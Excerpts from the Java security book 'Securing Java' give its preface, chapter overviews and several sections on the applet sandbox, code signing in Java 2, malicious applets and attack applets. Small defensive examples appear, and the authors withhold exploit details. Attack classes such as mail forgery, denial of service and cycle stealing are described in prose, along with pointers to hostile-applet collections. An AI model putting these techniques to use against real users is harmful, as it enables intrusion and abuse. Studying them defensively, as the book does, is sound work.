So how are holes usually discovered? Most often, the scenario goes something like this. Researchers discuss where potential flaws may lie by thinking about what is difficult to implement properly. Occasionally, researchers notice peculiar or surprising behavior in their work with Java and get an idea about what to investigate. The next step is to take a close look at the Java source code (for the VM and API classes) or the binary code if no source code is available. Sometimes, errors are obvious and exploits are easy. Other times, experimentation is required to turn a potential flaw into a real exploit. All of the holes described in this chapter can be exploited using attack applets. That means the holes covered here
are not esoteric flaws that are impossible to exploit. They are sometimes-subtle flaws that have been turned into full-fledged attacks.
Holes and Exploits

Every Java hole described in this chapter has an accompanying exploit. Another way of putting this is that there is an attack applet (the Java form of an exploit script) for each hole discussed here. However, the one-to-one correlation found in this chapter does not imply that it is necessary for every security hole to have an exploit. Holes are just vulnerabilities. Sometimes a hole will be recognized as a hole but cannot be exploited by itself. In these cases, multiple holes together create an exploit.

Think of attacking a system as climbing up a cliff. When you reach the top, you have successfully completed an attack. A security hole can be likened to a piton in the cliff with a piece of rope attached. Sometimes one piton is enough to help a climber make it to the top (especially if the climber is an experienced veteran). Other times, more than one piton may be needed. The holes discussed in this chapter have exploits of both categories. A majority of the attack applets require only one hole, but sometimes an attacker must leverage other weaknesses to exploit a hole. (A perfect example of the latter category is the Beat the System hole of July 1998.)
The Base Java Security Model: The Original Applet Sandbox
Java is designed so that programs can be dynamically loaded over the network and run locally. This very powerful paradigm promises to change the face of computing as we know it. A browser that can interpret Java byte code (such as Netscape Navigator or Internet Explorer) can download and locally execute applets that are embedded in a Web page. This activity of downloading and executing is completely automatic, requires no user approval, and sometimes occurs without the user even knowing. Remember, by simply pointing your browser at a Web page containing an applet, you start Java. Any applet started in this fashion is not required to advertise its presence. More and more Java applets appear on the Web every day. Applets are becoming ubiquitous. This means that surfing the Web with a Java-enabled browser is a more risky activity than surfing the Web in the days before Java. It is extremely unlikely that all users of Java-enabled browsers will consider the security implications of surfing a site before each Web page access. If the mobile code paradigm is going to work, security concerns should be addressed in the language of the content itself. That way, users will not need to worry too much about security. Java's designers took this task to heart. One of their fundamental concerns was making the use of Java transparent, automatic, and above all, safe. As a result, Java was developed with key security issues in mind. It is clear that the Java development environment attempts to address the security problems introduced by the idea of dynamically downloading and running external, untrusted code. To what extent Java succeeds in this task is a subject of debate. Security concerns have always been one of the major technical stumbling blocks to achieving safe mobile code. Java took these concerns seriously and made a good effort to protect Web users. In this chapter, we present the original (or base) Java security model and discuss how it mitigates some of the risks that applets introduce. The original Java security model presented in this chapter implements a sandbox that imposes strict controls on what certain kinds of Java programs can and cannot do. To the extent that the sandbox works, it allows a user to run untrusted code safely. As we discussed in Chapter 1, "Mobile Code and Security: Why Java Security Is Important," an alternative approach to handling mobile code is to run only code that is trusted. ActiveX controls, for example, are omnipotent and should be run only when you completely
trust the entity (person or corporation) that signed the control. It is clear that future mobile code systems will involve both a sandbox model and a trust model based on code signing. In fact, the two will likely be so intertwined that they cannot be easily teased apart. This is already happening in Java. There are many ways to impose a sandbox model on executable content; Java presents just one. Since the Java sandbox model has been widely distributed to millions of users with their Web browsers, it is safe to say that the Java sandbox is today's most widely used sandbox model. Until recently, it was correct to assume that a Java sandbox placed particular constraints on Java applets. JDK 1.1 changed all that, and as we pointed out in Chapter 1, the notion of a sandbox is becoming ever more complex. With the introduction of JDK 1.1, Java's sandbox model underwent a state transition from a required model applied equally to all Java applets to a malleable system that could be expanded and personalized on an applet-by-applet basis. The addition of code signing to Java complicates things immensely. As it now stands, the Java sandbox we detail in this chapter has been reduced to a default. Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," discusses how things work when this default sandbox policy is not used.
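To give a feel for how the default sandbox intervenes, here is a minimal sketch (ours, not one of the book's examples) of the kind of check the Security Manager performs when code tries to touch the local file system. It assumes a JDK old enough to still ship a SecurityManager, a default policy that grants the code no file permissions, and a made-up file path:

import java.io.FileInputStream;
import java.io.IOException;

public class SandboxDemo {
    public static void main(String[] args) {
        // Install a restrictive security manager, much as a Java-enabled
        // browser does before it runs any applet code.
        System.setSecurityManager(new SecurityManager());
        try {
            // The sort of call an untrusted applet might attempt.
            FileInputStream in = new FileInputStream("/etc/passwd");
            in.close();
        } catch (SecurityException e) {
            // The Security Manager vetoes the read before any I/O happens.
            System.out.println("Blocked by the sandbox: " + e);
        } catch (IOException e) {
            System.out.println("I/O trouble: " + e);
        }
    }
}

Run under a default policy with no extra grants, the FileInputStream constructor never gets as far as opening the file; the access check throws a SecurityException first.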
Chapter Two Sections
1. Potential Threats
2. What Untrusted Java Code Can't Do
3. What Untrusted Java Code Can Do
4. The Java Language and Security
5. The Three Parts of the Default Sandbox
6. The Verifier
7. The Class Loader Architecture
8. The Security Manager
9. Different Classes of Security
10. Type Safety
11. Browser-Specific Security Rules
12. The Fundamental Tradeoff
13. Is There Really a Java Security Policy?
Beyond the Sandbox: Signed Code and Java 2
Java has outgrown the original restrictive sandbox. The anticipated future of mobile code security, a complex mix of sandboxing and code signing, is now upon us with Java 2. In essence, the three parts of the sandbox explained in the previous chapter implement a language-based security enforcer. This enforcement model has been hybridized and expanded to include fine-grained notions of trust and permission built on digital signatures. That means major changes to Java security. This chapter centers on those changes.

Chapter 1, "Mobile Code and Security: Why Java Security Is Important," briefly introduced the notion of code signing and mobile code policy through the discussion of ActiveX. The ActiveX trust model is suited only to running completely trusted code. At the core of that kind of trust model is a black-and-white decision either to trust the code or not. Such a decision can be influenced by determining who vouches for the code. Digital signatures are used for the vouching.

Java's approach to trust is also based on digital signatures. However, instead of allowing only black-and-white trust decisions à la ActiveX, Java 2 allows fine-grained access control decisions to be made. With the introduction of code signing in JDK 1.1, Java's sandbox model underwent a state transition from a required model applied equally to all Java applets to a malleable system that could be expanded and personalized on an applet-by-applet basis. Java 2 further complicates the picture with the addition of access control. When combined with access control, code signing allows applets to step outside the security sandbox gradually. In fact, the entire meaning of sandbox becomes a bit vague.

As an example of how Java code signing might work, an applet designed for use in an Intranet setting could be allowed to read and write to a particular company database as long as it was signed by the system administrator. Such a relaxation of the security model is important for developers who have complained about Java's restrictive sandbox. Writing code that works within the tight restrictions of the sandbox is a pain, and the original sandbox is very restrictive. The addition of code signing to Java complicates things. As it now stands, the Java sandbox has been
reduced to a default. The whole game has changed. Tracing the history of this change as we do in this chapter can lend some important perspective. Before we dig into the complex issues of code signing and trust models, it does us good to review what it is we're trying to achieve in the first place. After all, the point of all this highfalutin' architecture is not to make the world's most complicated system. The real objective is securing mobile code. After we remind ourselves of the main goal of the new security model, we are ready to trace its evolution. We will begin by explaining the enhancements added to Java with the release of JDK 1.1, and go on to discuss the Java 2 model in detail.
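To make the intranet example above concrete, here is a minimal sketch of what such a grant looks like in Java 2 policy-file syntax. The keystore name, signer alias, codeBase URL, and database path are all hypothetical; a real deployment would substitute its own:

// Where to find the certificate for the signer alias used below.
keystore "intranet.keystore";

// Applets signed by the system administrator and loaded from the intranet
// server may read and write the company database files -- and nothing more.
grant signedBy "sysadmin", codeBase "http://apps.intranet.example.com/*" {
    permission java.io.FilePermission "/data/companydb/-", "read,write";
};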
Chapter Three Sections
1. What's the Main Goal?
2. Security Enhancements in JDK 1.1
3. Signed Code
4. Trust
5. An Introduction to Java 2 Security
6. Access Control and Stack Inspection
7. New Security Mechanisms in Sun's Java 2
8. Outside the Sandbox
Attack Applets: Exploiting Holes in the Security Model
There is a tightrope to walk in this chapter. You should understand the problems encountered with Java, so you know how things can go wrong, especially if you are charged with designing security-critical systems, administering a large number of Java users, or making business decisions that depend on Java security issues. But it is not the intent of this book to give the bad guys a manual for invading your computer. Although we discuss Java security problems, we hope you forgive the omission of details necessary to exploit these problems. Just for the record, we do not believe in security by obscurity. If we did, we would not have written this book at all. However, we don't believe in publishing exploit scripts and aiding and abetting attacks by inexperienced would-be crackers, either. Serious Java attacks have yet to escape the lab, and we want to do our part to keep it that way.

In the early days of Java, Sun Microsystems and the rest of the Java industry hyped Java as completely secure [Sun Microsystems, 1995]. This was really no surprise. They still have a lot to gain if you believe them and jump aboard the Java bandwagon without even considering the risks of doing so. It's true that Sun Microsystems, Netscape, Microsoft, and others have gone to great lengths to make their Java implementations as secure as possible. That's all well and good, but you don't want effort; you want results. To this day, the question remains: Is Java safe enough to use?

This chapter examines all of the serious security flaws that have been found in Java so far. By serious, we mean attacks based on these flaws could go beyond the annoyance or denial-of-service attacks of Chapter 4, "Malicious Applets: Avoiding a Common Nuisance." These attacks could corrupt data on your hard disk, reveal your private data to third parties, turn your machine into a hostile listening post, or infect your machine with a virus. By exploiting some of the vulnerabilities discussed here, a cracker could attain the ultimate cracker goal: complete control of your machine.

Java vendors are very quick to fix any problems that are discovered in Java. In fact, vendor response to the discovery of a new Java security hole far surpasses the usual response to non-Java-related security
problems posted to Bugtraq and other mailing lists run by security professionals (Bugtraq archives are available at www.geek-girl.com/bugtraq/). In terms of Java, the penetrate-and-patch machine is smoothly oiled (not that it represents the best approach to security, but that's another issue). Rest assured that the problems we discuss in this chapter have been fixed in the latest JVMs, including those packaged in Java-enabled browsers. That means if you're using an up-to-date version of your favorite browser, these specific problems won't affect you. On the flip side, if you're using an older browser like Netscape 2.x/3.x or Internet Explorer 3.x, this chapter provides enough information about serious attacks that you really should upgrade immediately. Browsers are not patched; they are made obsolete through accelerated release of new versions. Using an old browser to surf the Web is like wearing a "kick me" sign to a fraternity party.

Though these specific attacks are not likely to be your problem since they have been fixed, they indicate what sorts of things can go wrong and what the consequences are when things do go wrong. If more Java security problems are found in the future, they're likely to be similar to the ones presented here. Hopefully the industry can learn from its old mistakes and avoid reintroducing old holes (as often happens in computer security). Most of these problems were trivial to fix once they were discovered. Removing security bugs is like removing needles from a haystack: It's hard to find the needles, but they're easy to remove once you know where they are. To push the analogy a bit: It's obviously much better to find the needles before they stick you. This principle motivates our Java security research.
Chapter Five Sections
1. Implementation Errors or Specification Errors?
2. Attack Applets
3. What Applets Aren't Supposed to Do
4. A Chronology of Problems
5. Jumping the Firewall
6. Slash and Burn
7. You're Not My Type
8. Applets Running Wild
9. Casting Caution to the Wind
10. Tag-Team Applets
11. Big Attacks Come in Small Packages
12. Steal This IP Number
13. Cache Cramming
14. Virtual Voodoo
15. The Magic Coat
16. Verifying the Verifier
17. The Vacuum Bug
18. Look Over There
19. Beat the System
20. What These Problems Teach Us
Malicious Applets: Avoiding a Common Nuisance
Chapter 2, "The Base Java Security Model: The Original Applet Sandbox," and Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," explain how Java 2's security system works. This chapter and the next explain how it doesn't. Unfortunately, it is entirely possible to (mis)use Java, especially in its applet form, as a vehicle for attacking systems. Language-based security controls like those found in Java make writing a hostile applet more difficult than it might be otherwise, but they don't make it impossible. (Recall that Java security stacks up favorably against competing mobile code systems like ActiveX, as we discussed in Chapter 1, "Mobile Code and Security: Why Java Security Is Important.") Applets that misbehave and do something that their users don't want to happen are called hostile applets. There are two varieties of hostile applets: malicious applets and attack applets. The names of the two classes make it clear which is the more serious variety. Fortunately, attack applets are not commonly encountered on the Web; in fact, no attack applets have been seen to date in the wild (that is, outside the labs in which they were created). That's not to say that attack applets are not real. They are. Attack applets are real applets, written in everyday Java, that work against popular browsers such as the one you use. Attack applets have been created and extensively tested in the laboratory. (We return to the subject of attack applets in Chapter 5, "Attack Applets: Exploiting Holes in the Security Model.") There is, however, another more pervasive kind of hostile applet, not as serious a security concern, but still worthy of attention-the malicious applet. Unlike their attack applet cousins, malicious applets have escaped the lab. Such realities make it necessary for all users of Java-enabled browsers (and their trusty system administrators) to be aware of Java security threats. Simply surfing over to a Web page containing a hostile applet allows it to invade your machine with its malicious code. This chapter explores many malicious applets, ranging from the merely annoying to the more seriously disturbing. Near the beginning of Chapter 2, classes of potential Java threats were discussed. The four classes of attacks named were system modification attacks, invasion of privacy attacks, denial of service attacks, and antagonistic attacks. Java is a powerful enough language that, without security constraints placed on applets, it is possible to implement all four such classes of attacks. The Java security model was designed
to thwart those threats perceived to be the greatest dangers. Much ado has been made over Java security problems, and there have in fact been a number of serious flaws. We detail the truly serious problems in Chapter 5. Such problems result in intrusions that allow arbitrary system modification (effectively, unlimited access). An attack applet based on one of these strategies constitutes a cracker breaking into your machine.

It is true that the very serious attacks of the next chapter require an in-depth understanding of both Java and the Internet. It has been argued that we should feel fairly confident that few people will be able to exploit such esoteric vulnerabilities. That position is a dangerous one to take. One instance of a cracker discovering a novel attack applet will change such statements considerably. Once loose, attack applet information would quickly spread throughout the cracker community. Our job as security researchers is to find security holes and plug them before they are used by dishonest people. Security researchers also work to make the security model itself sound enough that holes are very rare. Fortunately, none of the serious attacks have shown up in the form of attack applets, although the possibility looms ominously. Don't breathe a sigh of relief yet.

Tampering with Java security does not always require wizardry. In fact, writing Java code to breach security can be easy. This chapter discusses some simple Java applets gone bad. Such applets are known on the Net as malicious applets. Entire collections are available for anyone interested to see, to adapt, and to use. See, for example:
● The Hostile Applets Home Page at www.rstcorp.com/hostile-applets
● DigiCrime at www.digicrime.com
● The Java Security Hotlist: Hostile Applets and Other Toys at www.rstcorp.com/javasecurity/applets.html
The best first defense against these sorts of applets is to learn about them.
Chapter Four Sections
1. What Is a Malicious Applet?
2. Annoying Applets
3. Denial of Service
4. Opening Untrusted Windows
5. Stealing Cycles
6. Forging Mail
7. Killing Off the Competition
8. Malicious Applets on the Web
9. The Implications
Mobile Code and Security: Why Java Security Is Important
Java security is more important than ever. Since its introduction in 1995, Java has become one of the most popular development platforms on the planet. In fact, Java has been widely adopted more quickly than any other computer language. It now easily tops the list of preferred platforms for Internet-savvy mobile code. There are tens of thousands of Java developers (some say hundreds of thousands), and demand for Java skills appears to be growing. Java is definitely here to stay.

Java holds great promise as a platform for component-based software, embedded systems, and smart cards. This means Java is poised to play an important enabling role in e-commerce as these systems move from ether-ware to reality. Java components (aka JavaBeans) are appearing at a rapid pace and encapsulate critical functionality for transaction-based systems. Java smart cards for e-commerce will debut soon.

But what of the hue and cry over security? Should people be so concerned about the security implications of Java that they disable Java in their browsers? Should developers avoid using Java in their systems in favor of other languages like C++? Should system administrators block Java content at the firewall (or better yet, can they)? Should business people avoid Java because of security problems? These are some of the questions this book answers. The answers are nontrivial, and the issues are as complex as they are important.
Chapter One Sections
1. Who Cares?
2. Mobile Code
3. The Power of Networking
4. Downloading Code: Not a New Problem
5. Java in a Demitasse
6. Securing Java
7. How Does Java Security Stack Up?
8. Where to Find More Information on Java
9. Mobile Code Has Its Price
10. Assessing the Risks
Preface
Java has grown by leaps and bounds since its introduction in 1996, and is now among the most popular computing platforms on the planet. Java has evolved and changed so much that at a mere two years old, our original work, Java Security: Hostile Applets, Holes, and Antidotes, found itself in serious need of revision and expansion. This book is the result of several years of thinking about mobile code and security, and includes many things we have discovered while working on real-world systems with businesses and government agencies. Our goal is to present enough information to help you separate fact from fiction when it comes to mobile code security.

Java has become much more complicated and multifaceted than it was when it was introduced. No longer simply a client-side language for applets, Java can now be found on everything from enterprise application servers to embedded devices like smart cards. We have tried to address security factors from throughout the entire Java range in this book.

We hope this book appeals to geeks and grandmothers alike (not that some grandmothers aren't geeks). Although it gets technical in places, we hope the messages are clear enough that even the casual Web user comes away with a broader understanding of the security issues surrounding mobile code. We kept four groups in mind as we wrote this book: Web users, developers, system administrators, and business decision-makers. Many of the issues of mobile code security cut across these groups. As Java integrates itself into the foundations of electronic commerce, Java security issues take on more urgency.

Java is only one kind of mobile code among many. Other systems immersed in the same security dilemma include ActiveX, JavaScript, and Word Macros. It is essential not to get the wrong message from this book. Our focus on Java is no accident. We believe Java is the most viable mobile code system created to date. Don't believe that through our work we imply that other systems are any more secure than Java. Just the opposite is true.

With the introduction of code signing to Java (in JDK 1.1) and its enhancement with access control (in Java 2), securing Java became much harder. Java's position along the security/functionality tradeoff has moved significantly toward functionality, to the detriment of security. This is good if you want more
functionality, which most businesses and developers seem to need, but it is bad if you are charged with managing security risks. Forming an intelligent Java use policy is more important than ever, but doing so is more complicated than it used to be.

The computer field moves so fast that people have begun to refer to Internet time to grapple with its constantly accelerating speed. Three months is a year in Internet time. Java is directly involved in the speed of the field, and has done its share to make things move even more quickly. One tricky aspect of writing a topical book relating to the Web is figuring out when to stop the action. This process can be likened to freeze-framing a picture of a movie. In that sense, this book is a snapshot of Java security. We hope we have succeeded in making it a useful way to learn about Java security. For up-to-date information, see the book's companion Web site at www.rstcorp.com/java-security.html.

As we went to press, Sun Microsystems renamed JDK 1.2 and called it Java 2. We have attempted to use correct version numbers throughout and apologize for any confusion.

Chapter 1, "Mobile Code and Security: Why Java Security Is Important," sets the stage with a discussion of the four intended audiences. As Java matures, it is making important inroads into the enterprise world. That means Java security is now as important to business people and system administrators as it is to Web users and Java developers. For the uninitiated, Chapter 1 provides a quick and cursory introduction to Java. Pointers are provided to more thorough Java texts that cover the ins and outs of the entire Java language in more detail. This is, after all, not a book on Java per se, but is instead a book on Java security. We also spend some time discussing why the once-important distinction between applets and applications has been superseded by concerns about trust. It turns out that under the Java 2 architecture, applets can be completely trusted and applications can be completely untrusted. In fact, every kind of Java code can be doled out different amounts of trust, depending on what the user's policy says. Finally, we cover some other popular forms of mobile code and discuss how their security stacks up against Java. The main purpose of this chapter is to provide some context for the later discussion of Java's critical security implications and to introduce the central idea of the book: weighing the benefits of Java use against the risks.

Chapter 2, "The Base Java Security Model: The Original Applet Sandbox," examines the base Java security model in some detail. As a prelude to our discussion, we introduce four categories of attacks, ranging from the very serious to the merely annoying: system modification, invasion of privacy, denial of service, and antagonism. We then discuss Java's programming-languages approach to security and introduce the three parts of the original applet sandbox. These include the Verifier, the Class Loader Architecture, and the Security Manager. We also introduce the idea that Java security fundamentally relies on ensuring type safety. The base sandbox provides the foundation of Java's new trust-based security model. Starting with a restrictive sandbox for untrusted code, restrictions can be lifted little by little until code takes on complete trust and is awarded full run of the entire system.

Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," examines Java's new trust-based security model.
With the addition of code signing in JDK 1.1, Java's security architecture underwent a large shift. Java 2 completed the transformation with the addition of access control. It is now possible to create
complex security policy for mobile code written in Java and have the Java system itself enforce the policy. The change certainly affords more power to mobile code than ever before, but it also introduces a major new risk to Java: a human-centered policy management risk. Setting up and managing a mobile code policy will be a complex and error-prone undertaking requiring security experience. JDK 1.1 and Java 2 rest on the notion of trust, which leverages the technological power of code signing. Understanding the new model requires understanding the way code signing and trust interact, and discounting some of the common myths associated with it. Chapter 3 ends with a discussion of stack inspection and the Java 2 code-signing API. (Appendix C, "How to Sign Java Code," is a code-signing tutorial covering Microsoft, Netscape, and Sun's three different code signing schemes.)

Chapter 4, "Malicious Applets: Avoiding a Common Nuisance," begins to discuss what happens when the Java security model is abused by hostile applets. Hostile applets come in two forms: very dangerous attack applets that involve security breaches, and merely annoying malicious applets that are more of a nuisance than anything else. Chapter 4 is all about malicious applets. Malicious applets are quite easy to create, and they are equally easy to find on the Web. Unfortunately, there are just as many unscrupulous individuals on the Net as there are in the rest of the world. Bad guys are more than happy to include Java in their list of offensive weapons. Our mission is to make Java users aware of common classes of attacks.

Chapter 5, "Attack Applets: Exploiting Holes in the Security Model," delves more deeply into the Java security model by focusing attention on some of the well-publicized security holes that have been discovered. This is where our discussion of hostile applets turns more serious. Securing Java is a difficult job, especially when it comes to implementing complicated models. Attack applets have been created in the lab that exploit the holes we discuss. Some of the holes are simple implementation bugs, while others indicate more serious design flaws. The good news is that Sun and other licensees take Java security very seriously and they respond quickly to fix any holes once they are discovered. We think discussing these holes is important since it emphasizes the true nature of computer security.

Chapter 6, "Securing Java: Improvements, Solutions, and Snake Oil," has two overall goals, both of which are meant to impact the Java security situation positively. The first is to suggest some high-level antidotes for Java security concerns that are not tied to particular attacks. Experts in computer security have pointed out several global deficiencies in the Java approach to security. Fixing some of these would certainly improve the model. High-level concerns addressed in Chapter 6 include programming language issues, formal analysis of Java, applet logging, trust, decompilation, applet monitoring, and policy management. Hopefully, some of the high-level concerns we raise will eventually be addressed in the Java platform itself. In the meantime, a number of third-party vendors are eager to help. The second goal of Chapter 6 is to introduce the players briefly and to discuss what risks third-party vendors can and cannot address. The computer security field has its share of snake oil, and complex issues such as mobile code security tend to be easy to exploit.
One of our goals is to bring some realism to the table and arm you with the right questions to ask. If you only read one chapter of this book, read Chapter 7, "Java Security Guidelines: Developing and Using Java More Securely." This chapter presents two sets of guidelines: one for Java developers and one for Java users. Writing security-critical code is not easy, and developers need all the help they can get. We
offer 12 rules for writing safer Java. Although the rules get a bit technical, it is worth spending some time to figure them out. By contrast, our guidelines for Java users are simple to understand and follow; in fact, most of them are simply common sense.

Chapter 8, "Java Card Security: How Smart Cards and Java Mix," is devoted to Java on smart cards. We decided to include this chapter since Java Cards are likely to show up in millions of consumer wallets in the next few years. Smart card security is really too big an issue to cover in a single chapter, so we focus primarily on the security impact of putting a Java Virtual Machine on a card. Chapter 8 covers six key questions, including: What is a smart card?, Why put Java on a smart card?, and How does the use of Java impact smart card security? We conclude by covering some of the challenges to mobile code that remain to be conquered.

Chapter 9, "The Future of Java Security: Challenges Facing Mobile Code," presents a concise set of six central lessons we have learned during our time in the Java security trenches. We go on to discuss several open research issues that you're likely to hear about again. Finally, we discuss the notion of security assurance, an important strategy in securing Java.

We hope that this book is both informative and useful. Making intelligent decisions regarding the use of Java (especially in business and other mission-critical systems) requires some knowledge of the current risks. Our goal is to disclose those risks, and countermeasures to curtail them, as clearly and objectively as possible. Armed with the knowledge that we present in this book, Java users, site managers, and business decision-makers can make better Java use policies.
Acknowledgments

This book is a collaborative effort in more ways than one. Not only did the authors work together closely, but we also sought input from many other people. We are grateful for the help we received.

Reliable Software Technologies (www.rstcorp.com) remains a great place to work. The intellectually stimulating environment makes going to work interesting and fun. Many people at RST read drafts of the book or helped in other ways. They include John Viega (intrepid proofreader and co-author of the code-signing tutorial in Appendix C), Tom O'Connor (who also read the entire manuscript more than once and co-wrote the code-signing tutorial), Anup Ghosh (fellow security researcher), Peggy Wallace (travel, anyone?), Lora Kassab (one-time RST intern whose code from the first edition lives on), Jeff Payne (RST's forward-thinking CEO), Jon Beskin, Matt Schmidt, Brad Arkin, Andi Bruno (who herds the marketing cats and makes us be nice), and Jeff Voas (who continues to lead RST's excellent research group by example).

The members of Princeton University's Secure Internet Programming Team (www.cs.princeton.edu/sip) also provided valuable input. Besides wading through several drafts, the Princeton team was responsible
for raising many of the key issues in Java security. Special thanks to Drew Dean and Dan Wallach (cofounders of the Princeton team) and Dirk Balfanz. Dan is now a professor at Rice University. Drew is a research scientist at Xerox PARC. Princeton's Computer Science department provides a wonderful environment for discovering and exploring new research topics. We would also like to thank Tom Cargill, independent consultant and discoverer of two security flaws; David Hopwood, discoverer of several attack applets; Mark LaDue, creator of the Hostile Applets Home Page (keep 'em honest, Mark); Dennis Volpano of the Naval Postgraduate School; Tom Longstaff, research director at the CERT Coordination Center; Roland Schemers, JavaSoft security implementation wizard (who helped with code-signing tool questions); Marianne Mueller, Java developer, security expert, and long-suffering target of press inquiries at JavaSoft; Jim Roskind, Netscape's Java security expert; Andrew Herbert, APM's Chief Scientist in the real Cambridge; Ken Ayer, chip card security manager at Visa; Don Byrd, UMass research associate and careful proofreader of the first edition; Hideyuki Hayashi, who translated the first edition into Japanese (and did an excellent job according to friends at Sumitomo in New York); Kieran Murphy, editor at developer.com; Chuck Howell, now at Mitretek; and Mike Shoffner, Java developer at Prominence Dot Com. Li Gong, security architect at JavaSoft, has been a particularly valuable help, both as a research colleague and as a sane point-of-view at JavaSoft. More power to you, Li. Wiley's staff did an excellent job shepherding this book through the editing and production process. Special thanks to Marjorie Spencer and Frank Grazioli, who went out of their way to make this project go smoothly. Thanks to Margaret Hendrey for playing fast and loose with extensions (don't tell anybody). Also thanks to the rest of the team at Wiley. Finally, and most importantly, we're grateful to our families for putting up with us while we worked on the book, again. Amy Barley, Jack, and Eli seem to have adjusted to Gary's persistent book-writing. Laura Felten and Claire suspect that Ed's book-writing has become an addiction. Without the support of our families, this book would not have been possible.
Footnotes

1. Some firewalls are now beginning to screen for Java class files, but it is unlikely that they will always be successful. For more on applet-blocking firewalls, see Chapter 6.
2. Actually, Java is capable of using either slashes or backslashes depending on the host's file system.
3. One particular class, java.lang.Object, has no superclass.
4. The machines the Princeton team attacks are always machines in their lab.
Malicious Applets: Avoiding a Common Nuisance
Section 9 -- The Implications
Unlike the technically adept attacks to be revealed in Chapter 5, these malicious applets are very easy to write. There are malicious applets that play background sounds endlessly. There are malicious applets that consume system resources, implementing denial-of-service attacks. There are applets that forge electronic mail. There are even applets that kill other applets' threads. Now that techniques are widely available on the Hostile Applets Home Page (among other places), it is only a matter of time before malicious applets spread. Because malicious applet source code has been put on the Web, hundreds of people can start to use and adapt the ideas. We have been lucky that this has not happened yet. Perhaps we will continue to be lucky, or perhaps not.

As we have seen, an applet need not break into your machine in order to do malicious things. Sometimes it is good enough to steal CPU cycles, or deny access to other sites. Malicious applets come in all shapes and sizes. Defending against all of the possibilities is at best a daunting task.

Malicious applets may even play a role in undermining business on the Net. Recall the Business Assassin applet that targets Gamelan. Other anti-business applets might send forged mail with thousands of seemingly legitimate orders (resulting in thousands of expensive returns). Another malicious applet could spam the Net with ads supposedly from you (perhaps planted by a competitor). This could effectively cut your business off the Net when people respond with mail bombs. It does not take too much foresight to fear the implications that these applets have for Net commerce.

At least for the moment, malicious applets are not widespread; however, it is only a matter of time before they are. Now is the time to look into ways to defend ourselves against them. Sun Microsystems agrees: "We recognize the importance of providing people with some mechanism to help them deal with hostile applets." Java 2 introduces mechanisms that can be used to help address the problem.
Beyond the Sandbox: Signed Code and Java 2
Section 8 -- Outside the Sandbox
Java 2 clearly introduces significant changes to the Java security landscape. It is likely that the days of black-and-white security policy for mobile code are numbered. With the major changes to Java's security architecture come a number of important responsibilities, the most important of which is mobile code policy creation and management. The tools are still primitive, but the policy itself is essential.

Also essential to any mobile code system that makes use of code signing is solid key management capability. Although the subject of public key infrastructure (PKI) is really beyond the scope of this book, we at least invoke some important concepts. Managers responsible for setting and maintaining policies based on signed code will encounter issues including choice of certificate authority, whom to issue keys to, how to ensure that private keys are kept private, whether to get a corporate key and how to protect it, how to disable keys of employees who leave an organization, where to store keys, and so on. These are nontrivial issues that have yet to be worked out in the real world. Hopefully, widespread support for code-signing systems will quickly appear on consumer desktops worldwide.

Truthfully, the PKI is much less mature than many security researchers and pundits predicted it would be by now. This is partly because deploying an effective PKI is much more difficult than it sounds. But it is also at least partially due to the greed of certificate authorities who chose to charge developers for identities (public/private key pairs) instead of issuing them for free and charging elsewhere for their use. Without a solid PKI, systems like Java 2 may take a while to catch on. We predict that signed mobile code will find its most pervasive use among early adopters as an intranet technology (as opposed to an Internet technology). Of course, we're very well prepared to be wrong about that.

For a long time, Java developers have wanted some way in which less restriction could be placed on their applets. At the same time, managers in many enterprises have been searching for ways to manage code (not just mobile code, but any code) more securely. In its Java 2 guise, Java offers a powerful answer to these needs.
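As a small illustration of what day-to-day key management looks like on the Java side (the alias and file names here are made up), the Java 2 keytool utility is used to generate a signer's key pair and to export the certificate that policy files and end users will rely on:

keytool -genkey -alias sysadmin -keystore intranet.keystore
keytool -export -alias sysadmin -file sysadmin.cer -keystore intranet.keystore

Generating the pair is the easy part; deciding who holds the keystore, how its password is protected, and when the certificate must be revoked is where the management burden described above really lies.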
We would be irresponsible not to note that with code signing comes a host of new risks to manage. Most notable among the risks are two: first, that the implementation will have holes (JDK 1.1 code signing has already fallen prey to this risk); and second, that security policies will get too complicated to understand and manage.
Malicious Applets: Avoiding a Common Nuisance
Section 1 -- What Is a Malicious Applet?
A malicious applet is any applet that attacks the local system of a Web surfer using one of the three less serious classes of attacks discussed in Chapter 2. Malicious applets involve denial of service, invasion of privacy, and/or annoyance. Malicious applets are written by researchers, crackers, and Net miscreants to harass, annoy, and damage Java users. They can even seriously damage a Java user's machine. Any applet that performs an action against the will of the user who invoked it should be considered malicious.

It is important to emphasize again that use of the term Java user applies equally to Java developers and people surfing the Web with a Java-enabled browser. Using Java does not require any programming, or even possession of the JDK; it is enough to use a Java-enabled browser. Under this definition, most people who surf the Web with Java on are Java users. Malicious applets exist on the Web today that do the following bad things:
● Forge mail from you to whomever the evil applet's author chooses, saying whatever they wish while masquerading as you
● Steal your CPU cycles to perform their own work while your legitimate processes languish
● Crash your local system by using all available system resources
These activities are both impressive and daunting, and we have only scratched the surface. There are also malicious applets created simply to annoy. These applets go only a bit too far, lingering at the edge of respectability. These sorts of applets do things like play sound files continuously, set up threads that monitor your Web use, and display unwanted graphics on your screen.
Stopping Malicious Applets before They Start
What can be done to stop malicious applets from doing their evil deeds? The best alternative now is to set a security policy that allows only applets signed by trusted parties to run. But if you want to surf with a Java-enabled browser and run every Java applet you come across on the Web, the safest thing to do is to avoid unknown and untrusted Web sites unless you first disable Java. Just by using a Java-enabled browser to surf the Web, you are open to attack by both attack applets and malicious applets. This danger, combined with the serious attacks discussed in Chapter 5, has caused the CERT Coordination Center to recommend disabling Java when surfing untrusted sites [CERT, 1996a; CERT, 1996b].

What can be done to stop these applets from doing their evil deeds in the future? There are many possibilities. One interesting approach would be to write detectors for bad applets based on known vulnerabilities. That way, they could be screened out by the byte code Verifier (or some similar extension). Princeton's Secure Internet Programming team has investigated this possibility extensively, and research at Reliable Software Technologies continues. (It turns out that the problem is harder than it may seem on first consideration.) A number of commercial enterprises now sell products that claim to screen byte code for malicious characteristics. We investigate these products in Chapter 6, "Securing Java: Improvements, Solutions, and Snake Oil."

